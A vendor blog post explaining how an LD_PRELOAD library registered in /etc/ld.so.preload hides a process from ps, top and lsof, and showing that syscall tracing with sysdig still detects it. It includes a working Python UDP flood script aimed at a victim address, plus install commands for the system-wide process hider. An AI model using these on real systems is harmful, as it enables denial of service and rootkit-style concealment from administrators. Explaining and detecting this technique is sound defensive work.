Hiding Linux Processes For Fun And Profit
The other day I was looking at the output of
top on my machine, and I wondered: how hard would it be to hide specific processes and/or network connections from traditional monitoring tools like
lsof, …? I decided to kill a couple hours and try to hack together a solution. In this post, I’ll show you some of the answers I came up with, and some proof of concept code to implement this. I’ll also show that sysdig is not susceptible to my hack, and explain why.
The goal that I want to achieve is to deliberately hide a simple and malicious Python script (I’ll call it
evil_script.py) that does some damage to my system, saturating CPU and network by sending UDP packets towards a poor victim:
#!/usr/bin/python import socket import sys def send_traffic(ip, port): print "Sending burst to " + ip + ":" + str(port) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.connect((ip, port)) while True: sock.send("I AM A BAD BOY") if len(sys.argv) != 3: print "Usage: " + sys.argv + " IP PORT" sys.exit() send_traffic(sys.argv, int(sys.argv))
The Baseline Behavior
I’ll start by running this:
gianluca@sid:~$ ./evil_script.py 184.108.40.206 666 Sending burst to 220.127.116.11:666
If you run it, you’ll see it will quickly saturate your system resources. Perfect use case for starting the analysis. Let’s confirm that the process is there and eating my CPU, using
gianluca@sid:~$ ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND ... gianluca 8585 105 0.0 34256 6152 pts/6 R+ 12:03 0:07 /usr/bin/python ./evil_script.py 18.104.22.168 666 ...
Yep. I can also look at the network connections opened by the process by using
gianluca@sid:~$ sudo lsof -i COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME ... evil_scri 8290 gianluca 3u IPv4 23936 0t0 UDP 172.16.189.136:33220->22.214.171.124:666 ...
So the process is there, doing network activity. If I want to hide this information, the first thing I have to do is understand how
ps and similar tools can actually extract the information about my process.
How ps works
ps leverage the
/proc file system, a Linux construct that we explained at a high level in a previous post. Let’s dig into the details now using
gianluca@sid:~$ sudo sysdig proc.name = ps ... 447463 23:54:12.077878685 2 ps (3214) > openat dirfd=AT_FDCWD name=/proc flags=1089(O_DIRECTORY|O_NONBLOCK|O_RDONLY) mode=0 447465 23:54:12.077880122 2 ps (3214) < openat fd=5(/proc) 447473 23:54:12.077887674 2 ps (3214) > getdents 447486 23:54:12.077988237 2 ps (3214) < getdents ... 452546 23:54:12.082257864 2 ps (3214) > open 452547 23:54:12.082259424 2 ps (3214) < open fd=6(/proc/3174/stat) name=/proc/3174/stat flags=1(O_RDONLY) mode=0 452548 23:54:12.082259730 2 ps (3214) > read fd=6(/proc/3174/stat) size=1024 452549 23:54:12.082262601 2 ps (3214) < read res=322 data=3174 (evil_script.py) R 3089 3174 3089 34816 3174 4202496 1620 0 15 0 8 3474 0 0 452550 23:54:12.082262874 2 ps (3214) > close fd=6(/proc/3174/stat) 452551 23:54:12.082262982 2 ps (3214) < close res=0 452552 23:54:12.082266445 2 ps (3214) > open 452553 23:54:12.082267682 2 ps (3214) < open fd=6(/proc/3174/status) name=/proc/3174/status flags=1(O_RDONLY) mode=0 452554 23:54:12.082268000 2 ps (3214) > read fd=6(/proc/3174/status) size=1024 452555 23:54:12.082274407 2 ps (3214) < read res=854 data=Name:.evil_script.py.State:.R (running).Tgid:.3174.Ngid:.0.Pid:.3174.PPid:.3089. 452556 23:54:12.082274624 2 ps (3214) > close fd=6(/proc/3174/status) 452557 23:54:12.082274724 2 ps (3214) < close res=0 452558 23:54:12.082276935 2 ps (3214) > open 452559 23:54:12.082278171 2 ps (3214) < open fd=6(/proc/3174/cmdline) name=/proc/3174/cmdline flags=1(O_RDONLY) mode=0 452560 23:54:12.082278466 2 ps (3214) > read fd=6(/proc/3174/cmdline) size=131072 452561 23:54:12.082280215 2 ps (3214) < read res=46 data=/usr/bin/python../evil_script.py.126.96.36.199.6666. 452562 23:54:12.082280463 2 ps (3214) > read fd=6(/proc/3174/cmdline) size=131026 452563 23:54:12.082280814 2 ps (3214) < read res=0 data= 452564 23:54:12.082281083 2 ps (3214) > close fd=6(/proc/3174/cmdline) 452565 23:54:12.082281216 2 ps (3214) < close res=0
This perfectly highlights how
ps works: first, the directory
/proc is opened via the
openat() system call. Then, the process calls
getdents() on the opened directory, which is a system call that returns the list of files/directories contained in a specific directory (
/proc in this case). If you’ve ever run
ls /proc, you noticed that there is a subdirectory for every running process in the system, and each directory is named after the PID of the process itself. So,
ps will just grab the list from
getdents(), and then iterate over a fixed set of files in each subdirectory. These files, as you can see from the event list, are named
/proc/PID/cmdline, and contain all the information that ps shows in the output.
It’s worth noticing (as it will be useful in the next section), that the process itself doesn’t directly call
getdents(), as those are system calls that are abstracted by the C standard library (
libc). If you ever cared to read the
libc provides two different functions,
readdir(), and they take care of calling the system calls themselves, providing a somewhat simpler API to the developer. So these last ones are the functions that are directly called from
Hiding the process
After this quick digression on how
ps works, it seems fairly obvious that if we want to hide our process, we need a way to prevent these tools from accessing the proper files under
/proc/PID/. What are the options? There are various methods worth mentioning:
- Using a proper framework: there are a bunch of very good frameworks, like SELinux and Grsecurity that do, among other things, exactly this. In a production system, I would absolutely consider these, although today I want to get my hands dirty and have fun creating something from scratch.
- Modify top/ps/… binaries: I could grab the source code of each of these tools, implement my own “hiding linux processes” logic, recompile, and replace the binaries. Very inefficient and time consuming.
libc: I could modify the
libcand input the code to exclude the access to some
/procfiles. But recompiling
libcis a burden, not to mention the
libccode tends to be very hard to understand.
- Modify the system calls in the kernel: This is the most advanced, and it would work by intercepting and modifying the
getdents()system call directly in the kernel with a custom module. It’s definitely tempting, but I won’t follow this route today because I’m already very familiar with how the system call interception works in sysdig, so I want to do something new.
I decided to go for an intermediate solution, one that is interesting and simple enough to implement in an hour or so: it’s a variant of “modifying
libc” based on a tricky feature offered by the Linux dynamic linker (the component that takes care of loading the various libraries needed by a program at runtime), called preloading.
With preloading, Linux is kind enough to give us the option to load a custom shared library before the other normal system libraries are loaded. This means that, if the custom library exports a function with the same signature of one found in a system library, we are literally able to override it with the custom code in our library, and all the processes will automatically pick our custom one!
This sounds like a solution to my problem, because I could write a very simple custom library that overrides
readdir(), and write the logic to hide the process! The logic would be fairly straightforward too: every time I see that the
/proc/PID directory (where PID is the PID of the process having the name “evil_script”) is being read, I just block that access in a clean way, thus hiding the entire directory! I went ahead and implemented these thoughts in code. You can get the sources at https://github.com/gianlucaborello/libprocesshider/blob/master/processhider.c (it’s actually less than 100 lines of code including comments, so go read it!). Once the code is written, let’s compile it as a shared library, and install it in the system path:
gianluca@sid:~/libprocesshider$ make gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl gianluca@sid:~/libprocesshider$ sudo mv libprocesshider.so /usr/local/lib/
Now, I just need to tell the dynamic linker to actually use it. I want to install it system-wide, so that every new process in the system can pick this up automatically. This is done by simply writing my library path into a configuration file:
root@sid:~# echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
Done! From this moment on, every new binary that I’ll launch will execute my custom code when iterating through directories via
readdir(). So let’s go back and try this executing
lsof while the evil script is running:
gianluca@sid:~$ sudo ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND ... gianluca@sid:~$ sudo lsof -ni COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME ...
It works! My process is now running in invisible mode, even when the tools are run as root. I also repeated this with
htop, and none of them were able to show my process anymore.
This is just a simple example, but we could also spoof more information, for example:
- Modify the global CPU usage counters:
/proc/statcontains those statistics, so I could intercept all the read operations to that file and return a custom one, faking a 0% global CPU usage.
- Modify the connection list: for example, netstat uses the
/proc/net/tcpfile to get the list of TCP connections. Just intercept the reads to the file and hide a specific connection.
Good exercises for the reader :)
Note that this method won’t work if the binaries are statically linked against
libc. I’ve seen some niche distributions extremely focused on security, where all the binaries dependencies are statically linked. This has the huge disadvantage that the binaries tend to get pretty big, and shipping an update for a library forces shipping new binaries of every program that depends on it, so usually it’s not done for mainstream distributions.
Let’s see if sysdig can be tricked as well, starting by CPU usage:
gianluca@sid:~$ sudo sysdig -c topprocs_cpu CPU% Process ------------------------------ 99.99% evil_script.py 2.46% sysdig 0.27% java 0.03% sshd
And network activity:
gianluca@sid:~$ sudo sysdig -c topprocs_net Bytes Process ------------------------------ 862.53KB evil_script.py 400B sshd gianluca@sid:~$ sudo sysdig -c topconns Bytes Proto Connection ------------------------------ 841.79KB udp 172.16.189.136:54241->188.8.131.52:8888 496B tcp 172.16.189.1:57832->172.16.189.136:22
With sysdig, we’re still able to see it all! This is because sysdig doesn’t necessarily rely on
/proc to look for system activity (although it uses it if available). Sysdig inspects every system call, and in this data the malicious process is still clearly visible, along with all its used resources. Hiding system calls is a much more challenging task that can’t be done in a couple hours. In fact, sysdig can see everything:
gianluca@sid:~$ sudo sysdig proc.name contains evil_script 261683 19:27:57.433924531 0 evil_script.py (43534) > sendto fd=3(172.16.189.136:54241->184.108.40.206:8888) size=14 tuple=NULL 261684 19:27:57.433930125 0 evil_script.py (43534) < sendto res=14 data=I AM A BAD BOY 261685 19:27:57.433931321 0 evil_script.py (43534) > sendto fd=3(172.16.189.136:54241->220.127.116.11:8888) size=14 tuple=NULL 261686 19:27:57.433970361 0 evil_script.py (43534) < sendto res=14 data=I AM A BAD BOY 261687 19:27:57.433975269 0 evil_script.py (43534) > sendto fd=3(172.16.189.136:54241->18.104.22.168:8888) size=14 tuple=NULL 261688 19:27:57.433980600 0 evil_script.py (43534) < sendto res=14 data=I AM A BAD BOY 261689 19:27:57.433981682 0 evil_script.py (43534) > sendto fd=3(172.16.189.136:54241->22.214.171.124:8888) size=14 tuple=NULL 261690 19:27:57.434022148 0 evil_script.py (43534) < sendto res=14 data=I AM A BAD BOY 261691 19:27:57.434026297 0 evil_script.py (43534) > sendto fd=3(172.16.189.136:54241->126.96.36.199:8888) size=14 tuple=NULL ...
As a bonus, sysdig is also showing me that the dynamic linker is loading my custom library before
libc. This is what happens when
ps executes after the preload change:
gianluca@sid:~$ sudo sysdig proc.name = ps 2731 00:21:52.721054253 1 ps (3351) < execve res=0 exe=ps args=aux. tid=3351(ps) pid=3351(ps) ptid=3111(bash) cwd=/home/gianluca fdlimit=1024 pgft_maj=0 pgft_min=62 vm_size=512 vm_rss=4 vm_swap=0 ... 2739 00:21:52.721129329 1 ps (3351) < open fd=3(/usr/local/lib/libprocesshider.so) name=/usr/local/lib/libprocesshider.so flags=1(O_RDONLY) mode=0 2740 00:21:52.721130670 1 ps (3351) > read fd=3(/usr/local/lib/libprocesshider.so) size=832 ... 2810 00:21:52.721293540 1 ps (3351) > open 2811 00:21:52.721296677 1 ps (3351) < open fd=3(/lib/x86_64-linux-gnu/libc.so.6) name=/lib/x86_64-linux-gnu/libc.so.6 flags=1(O_RDONLY) mode=0 2812 00:21:52.721297343 1 ps (3351) > read fd=3(/lib/x86_64-linux-gnu/libc.so.6) size=832 ...
/usr/local/lib/libprocesshider.so is automatically loaded (with
/lib/x86_64-linux-gnu/libc.so.6, without having to change the
ps code or the
In theory, I could have used
strace/ltrace to attach to the process and see what it was doing in a similar way, but if you remember I completely hid the malicious process PID from
/proc, so how would we find it? Those tools require the exact PID to attach in order to work. I could have brute-forced the entire PID range, but that doesn’t seem like a very attractive alternative. Also, those tools just provide a flat list of events, whereas sysdig, with chisels, can aggregate the events and show me exactly what I care about (in this case CPU/network consumption).
As one last consideration, it’s worth clarifying that although it might be possible to get your machine compromised in this exact way (I know there are rootkits out there who rely on this easy and effective method), that is certainly not the point of this post. I just enjoyed it as a thought experiment, and hopefully this demonstrates a simple and powerful method that can be used by application developers to solve real problems in certain circumstances. I think this also proves that monitoring the system usage can be done from different perspectives, and getting data from system calls can be as good as extracting it from the
/proc file system. And at the end of the day, I think we’re all very lucky to have Linux and the
/proc file system with its useful metrics exported in plain-text files, ready to be read and inspected without any custom tools!
As always, we'd love to hear from you. If you have any thoughts or questions, please let us know in the comments or on @sysdig. Thanks!
Btw, we are running a webinar discussing the challenges of troubleshooting issues and errors in Docker containers and Kubernetes, like pods in CrashLoopBackOff, join this session and learn:
- How to gain visibility into Docker containers with Sysdig open source and Sysdig Inspect.
- Demo: troubleshoot a 502 Bad Gateway error on containerized app with HAproxy.
- Demo: troubleshoot a web application that mysteriously dies after some time.
- Demo: Nginx Kubernetes pod goes into CrashLoopBackOff, what's you can do? Will show you how to find the error without SSHin into production servers.
Start Your Free Trial Today